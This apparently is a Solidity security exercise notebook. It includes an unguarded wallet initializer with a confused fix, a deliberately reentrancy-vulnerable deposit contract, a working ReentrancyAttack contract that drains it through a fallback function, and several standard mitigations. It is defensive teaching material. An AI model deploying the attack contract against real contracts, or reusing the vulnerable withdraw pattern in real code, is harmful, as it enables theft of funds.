# Question 2

In [ ]:
// constructor - just pass on the owner array to the multivorced and
// the limit to daylimit
function initWallet(address[] _owners, uint _required, uint _daylimit) {
    initDaylimit(_daylimit);
    initMultivorced(_owners, _required);
}

In [ ]:

constructor(address[] _owners, uint _required, uint _daylimit) {
    initDaylimit(_daylimit);
    initMultivorced(_owners, _required);
}

bool private initialized = false;

function initWallet(address[] _owners, uint _required, uint _daylimit) {
    require(!initialized, "Already initialized");
    initDaylimit(_daylimit);
    initMultivorced(_owners, _required);
    initialized = true;
}

# Question 5

In [ ]:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract HelloWorld {
    string private greeting = "Hello, world!";
    
    function getGreeting() public view returns (string memory) {
        return greeting;
    }
    
    function setGreeting(string memory _newGreeting) public {
        greeting = _newGreeting;
    }
}

In [ ]:
// SPDX-License-Identifier: MIT
pragma solidity >=0.5.1 <0.9.0;

contract HelloWorld {
    string private greeting;

    constructor() {
        greeting = "Hello, world!";
    }

    function getGreeting() public view returns (string memory) {
        return greeting;
    }

    function setGreeting(string memory _newGreeting) public {
        greeting = _newGreeting;
    }
}

# Question 6

In [ ]:
pragma solidity ^0.4.24;

contract Dangerous {
    mapping(address => uint) deposits;
    
    function depositMoney() public payable {
        deposits[msg.sender] += msg.value;
    }
    
    function withdraw(uint amount) public {
        require(deposits[msg.sender] >= amount);
        if (!msg.sender.call.value(amount)()) {
            revert();
        }
        deposits[msg.sender] -= amount; // 错误：状态更新在外部调用之后
    }
}

In [ ]:
pragma solidity ^0.4.24;

interface Dangerous {
    function depositMoney() external payable;
    function withdraw(uint amount) external;
}

contract ReentrancyAttack {
    Dangerous public target;
    uint public attackAmount;
    
    constructor(address _target) public {
        target = Dangerous(_target);
    }
    
    function attack() public payable {
        require(msg.value > 0);
        target.depositMoney.value(msg.value)();
        attackAmount = msg.value;
        target.withdraw(attackAmount);
    }
    
    function() public payable {
        if (address(target).balance >= attackAmount) {
            target.withdraw(attackAmount);
        }
    }
    
    function collectEther() public {
        msg.sender.transfer(address(this).balance);
    }
}

In [ ]:
function withdraw(uint amount) public {
    require(deposits[msg.sender] >= amount);
    
    // EFFECTS: 先更新状态
    deposits[msg.sender] -= amount;
    
    // INTERACTIONS: 最后进行外部调用
    if (!msg.sender.call.value(amount)()) {
        revert();
    }
}

In [ ]:
bool private locked = false;

function withdraw(uint amount) public {
    require(!locked, "Reentrancy detected");
    require(deposits[msg.sender] >= amount);
    
    locked = true;
    deposits[msg.sender] -= amount;
    
    if (!msg.sender.call.value(amount)()) {
        revert();
    }
    
    locked = false;
}

In [ ]:
function withdraw(uint amount) public {
    require(deposits[msg.sender] >= amount);
    deposits[msg.sender] -= amount;
    payable(msg.sender).transfer(amount);
}

In [ ]:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract SecureWallet is ReentrancyGuard {
    mapping(address => uint) deposits;
    
    function withdraw(uint amount) public nonReentrant {
        require(deposits[msg.sender] >= amount);
        deposits[msg.sender] -= amount;
        payable(msg.sender).transfer(amount);
    }
}